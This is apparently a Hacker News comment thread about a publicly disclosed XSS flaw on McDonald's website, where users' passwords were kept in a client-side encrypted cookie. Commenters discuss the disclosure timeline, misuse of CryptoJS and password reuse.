It's not as if franchisees can just choose to purchase whatever equipment they want. It all has to come from corporate, so corporate is the place to enforce security standards.


Oh wow. That model is atrocious in terms of providing decent security.


>Public Disclosure: 05 Jan 2017 23:31:42 GMT Which was roughly 2-3 days after returning from New Year's.

Public release was way too early, author should have waited.


Sounds like a northern hemisphere mentality. Likely where the team a based, but anyone not up top is doing the best to avoid work at the moment as it's mid summer and fantastic.


McDonalds should invent some new characters like the Hackburglar and Cap'n Crook to educate the public about computer security.


Love the CryptoJS. This is how I store all my own text files on my own computer.

It's just so bizarre. What were they expecting that to achieve?


It was probably a bullet point that helped sale the agency that built the site to a McDonalds executive/manager.


> What were they expecting that to achieve?

we added a crypto for security measures. this seemed like a good place to add a crypto. it is now more secure.

In my basement I have a fingerprint+PIN protected blastproof safe bolted to the foundation. I use it to store my house keys, so that if anyone breaks into my house, they won't get access to my house.


Someone said "we need crypto" but didn't understand it as a concept.



Better title would be "Non-persistent XSS on McDonald's website through AngularJS misuse"


Is it true that having one set of usernames and passwords makes it easier to crack a set from another website?

Does every crack, or leak, of usernames and passwords make it slightly easier to crack all other databases?

because some people still use the same password for multiple accounts.


Yes this has been researched and is true.

http://www.pcworld.com/article/219303/password_use_very_comm...


So someone wrote an angular app that stores your password in a cookie in your own browser that is encrypted client-side using cryptojs...

Hmm. Seems on par with the security of pretty much every angularjs site i've seen. Moving on.


Why the downvote? This is extremely relevant. There is no 100% security, there is no reason to store sensitive information (even "encrypted").

Had this been a session token the problem would have been less severe (session tokens won't be reused on the user's Gmail account for instance), easier to detect, and easier to mitigate once discovered.


> Why the downvote?

Probably because of this:

> Hmm. Seems on par with the security of pretty much every angularjs site i've seen. Moving on.


Interesting, how many users with password like '123' or 'monkey' has McDonald's, like 50% ? Because, who will give such a website a normal password?! ;)


I wonder if this affects MyMcDs.ca in Canada.


ADs are getting smarter


What are those?


HN next week: "stealing voucher tickets from Chuck E. Cheese"

Sweet sweet karma from some low hanging fruit never hurt eh? :)


The explanation on itself, regardless of 'impact', is already instructive and worth an HN post, in my opinion.

The timeline at the bottom was informative as well; it shows that even (or maybe 'especially') for an organisation as big as theirs it is hard to actually get the problem at the right location in the enterprise, and / or respond to it and / or solve it.


Curious! Ten days after a public disclosure, and no statement from McDonald's? Have they fixed the problem? Do they not know?




Applications are open for YC Winter 2018

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | DMCA | Apply to YC | Contact

Search: